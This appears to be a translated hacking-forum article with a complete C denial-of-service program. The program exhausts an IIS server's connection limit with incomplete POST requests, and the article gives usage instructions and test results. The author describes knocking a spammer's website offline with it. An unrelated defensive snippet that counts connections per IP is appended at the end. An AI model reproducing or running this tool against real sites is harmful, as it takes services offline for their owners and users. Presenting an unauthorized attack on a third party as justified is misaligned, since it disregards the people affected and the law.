Using the IIS maximum number of connections to test site bandwidth

ID MYHACK58:62200819313
Type myhack58
Reporter Anonymous
Modified 2008-06-10T00:00:00


This program is for technical exchange only and must not be used for illegal purposes! I recently bought some web space to play with. Don't laugh: it is an entry-level virtual host, a rather poor one, and its parameters are all quite low, particularly the IIS connection count, which is only 100; that is, it supports 100 different visitors at the same time. Here a problem arises. If I keep opening connections to the site, I am still the same person, but IIS naively treats each connection as a different visitor and assigns a session to each one. When the number of connections exceeds the IIS maximum set on the server... denial of service occurs. The attack itself is, of course, carried out by a program. The idea is simple: keep sending HTTP requests to the website until its maximum number of connections is exceeded. I happened to have on my machine a test program that I wrote earlier, after reading shotgun's article on using the HTTP protocol Content-Length limit vulnerability to cause a denial of service attack. It is very close to today's requirement, so I changed it slightly. The code is as follows:

( , debugged successfully on XP SP1. The compiled program can be downloaded from the attachment to this document.)

```cpp
#include "winsock.h"
#include "stdio.h"
#include "string.h"
#include "io.h"

#pragma comment(lib,"ws2_32.lib")

#define BUFLEN 1024
#define MAXThreadCount 10 //set the maximum number of threads

int ThreadCount=0;

struct mydata
{
    char *ip;
    int port;
};

unsigned int resolve(char *name)
{
    struct hostent *he;
    unsigned int ip;

    if((ip=inet_addr(name))==(-1))
    {
        if((he=gethostbyname(name))==0)
            return 0;
        memcpy(&ip,he->h_addr,4);
    }
    return ip;
}

DWORD WINAPI Dos(LPVOID lpParam )
{
    mydata *csdn = (mydata *)lpParam;
    struct sockaddr_in server;
    server.sin_family = AF_INET;
    server.sin_port = htons(csdn->port);
    server.sin_addr.s_addr = resolve((char*)csdn->ip);
    if(server.sin_addr.s_addr==0)
    {
        printf("Don't find address for %s\n",(char*)csdn->ip);
        exit(0);
    }
    int my;
    char buf[100]="POST / HTTP/1.1\r\nHost: ";
    strcat(buf,(char*)csdn->ip);
    strcat(buf," \r\nContent-Length: 10\r\n\r\n");
    my=socket(AF_INET,SOCK_STREAM,0);
    if(my==INVALID_SOCKET)
    {
        printf("ERROR");
        exit(0);
    }
    if(connect(my,(struct sockaddr *) & server,sizeof(server))==SOCKET_ERROR)
    {
        printf("Socket ERROR:%d",GetLastError());
        exit(0);
    }
    if(send(my,buf,strlen(buf),0)==SOCKET_ERROR){printf("ERROR:send fail!");}
    ThreadCount--;
    return 0;
}

void thread ( char *a1 , char *a2 , char *a3 )
{
    static mydata tmp;
    tmp.ip = a1;
    tmp.port = atoi(a2);

    DWORD dwThreadId;
    HANDLE hThread;
    WSADATA ws;
    if (WSAStartup( MAKEWORD(2,2), &ws )!= 0)
    {
        printf(" [-] WSAStartup() error\n");
        exit(0);
    }
    hThread = CreateThread(
        NULL,          // no security attributes
        0,             // use default stack size
        Dos,           // thread function
        &tmp,          // argument to thread function
        0,             // use default creation flags
        &dwThreadId);  // returns the thread identifier
    if (hThread == NULL)
        printf( "CreateThread failed." );
    ThreadCount++;
    Sleep(200); //delay, otherwise the CPU will use the full......
    CloseHandle(hThread);
}

int main(int argc, char* argv[])
{
    int i=0;
    if(argc!= 4)
    {
        printf("\n\tIIS MaxConnectionCount DOS by lake2 ,Jul,8,2005\n");
        printf("-Usage:\n");
        printf("%s \n",argv[0]);
        printf("-Example: %s 80 300\n",argv[0]);
        return 0;
    }
    printf("Starting DOS............. Ctrl + C to break\n");
    while( i < atoi(argv[3]) )
    {
        if( ThreadCount < MAXThreadCount ){ thread(argv[1],argv[2],argv[3]); i++;}
    }
    while( 1 ){ }
    WSACleanup();
    return 0;
}
```

The program is a command-line program with three parameters, in order: the domain name of the website to attack, the port, and the number of connections. Now, to test the effect first. The test target is a PC running Win2000. With the maximum number of connections in IIS Management set to 200, the website soon could not be visited; increased to 500, it still went down; at 800, it went down all the same. During the test the computer was running World of Warcraft, which stayed normal throughout. It seems our program deals only with the website and does not harm the innocent. ^_^

That being so, I simply tried with the IIS number of connections set to unlimited. I filled in 8000 for the program's connection parameter; the result was that my own system ran out of buffer space, winsock produced error 10055, and the program aborted. It seems this method only works against small sites on virtual hosting. Good, now to actually use it. I opened my mailbox and happened to find an advertising spam message, visited the guy's website, and then started to attack it; for a small site like this, setting the connection count to 300 is more than enough. Soon that website stopped working. Hey, I can't be blamed for this; who told him to send spam. Well, the test is completed and has passed acceptance, so I won't play with him any more.

This is just a test program; to really put it into use, it would still need to be polished. One more word of nonsense: if you have no deep grudge against someone, don't DoS them.
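Because the program above opens all of its connections from one machine, the server sees a single remote address holding a large share of the configured IIS maximum. The following C check for that condition is an added example, not part of the original article; the netstat-style row format, the sample addresses, the function name `heaviest_source` and the 50% threshold are assumptions constructed for illustration.

```c
#include <stdio.h>
#include <string.h>
#define MAX_SOURCES 64
struct source { char ip[46]; int open; };

/* Constructed netstat-style rows (IPv4): proto, local, remote, state. */
static const char *SAMPLE_ROWS[] = {
    "TCP 192.0.2.10:80 203.0.113.7:49152 ESTABLISHED",
    "TCP 192.0.2.10:80 203.0.113.7:49153 ESTABLISHED",
    "TCP 192.0.2.10:80 198.51.100.4:51200 ESTABLISHED",
    "TCP 192.0.2.10:80 203.0.113.7:49154 ESTABLISHED",
    "TCP 192.0.2.10:80 203.0.113.7:49155 TIME_WAIT",
    "TCP 192.0.2.10:80 203.0.113.7:49156 ESTABLISHED",
};
#define SAMPLE_COUNT ((int)(sizeof SAMPLE_ROWS / sizeof SAMPLE_ROWS[0]))

/* Count ESTABLISHED connections per remote IP; if the heaviest source holds at
   least share_pct% of site_limit, copy its IP out and return its count, else 0. */
int heaviest_source(const char **rows, int n, int site_limit, int share_pct,
                    char *ip_out, size_t ip_len)
{
    struct source tab[MAX_SOURCES];
    int used = 0, best = -1;
    for (int i = 0; i < n; i++) {
        char ip[46], state[16];
        if (sscanf(rows[i], "%*s %*s %45[^:]:%*d %15s", ip, state) != 2 ||
            strcmp(state, "ESTABLISHED") != 0)
            continue;               /* malformed, or not holding a slot */
        int j = 0;
        while (j < used && strcmp(tab[j].ip, ip) != 0) j++;
        if (j == used) {            /* first connection from this source */
            if (used == MAX_SOURCES) continue;  /* table full */
            strcpy(tab[used].ip, ip);
            tab[used++].open = 0;
        }
        if (++tab[j].open > (best < 0 ? 0 : tab[best].open))
            best = j;
    }
    if (best < 0 || tab[best].open * 100 < site_limit * share_pct)
        return 0;
    snprintf(ip_out, ip_len, "%s", tab[best].ip);
    return tab[best].open;
}

int main(void) {
    char ip[46];
    int n = heaviest_source(SAMPLE_ROWS, SAMPLE_COUNT, 8, 50, ip, sizeof ip);
    if (n) printf("%s holds %d of 8 connection slots\n", ip, n);
    return 0;
}
```

The sample uses a limit of 8 only to keep the constructed table short; on a real host `site_limit` would be the configured maximum, such as the 100 mentioned in the article.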